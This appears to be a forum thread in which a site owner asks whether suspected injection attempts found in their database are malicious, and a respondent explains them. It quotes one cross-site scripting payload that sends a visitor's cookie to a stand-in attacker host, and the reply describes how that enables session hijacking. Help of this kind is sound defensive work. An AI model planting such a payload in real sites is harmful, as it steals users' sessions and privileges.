I just found something in my database that look like they might be injection attemps. I'm wondering if they might be doing anything malicious to my database or not. Thanks.
Your search for 'flowers evil_script()' returned the following results:evil_script()' returned the following results
Window.location='http:attacker?cookie='+document.cookie.
@jessica, to me it looks like the script is trying to redirct a user to the attackers site along with a cookie. This could be used to try and steal the session cookie of the user and essentially login as that user.
If the user effected is an administrator or someone with elevated privileges, the attacker would have the same rights as that user.
I'd be curious if you could find the actual script somewhere in your database (site files) or if someone just performed a search on your site and got an error.
Was this found in a logging table?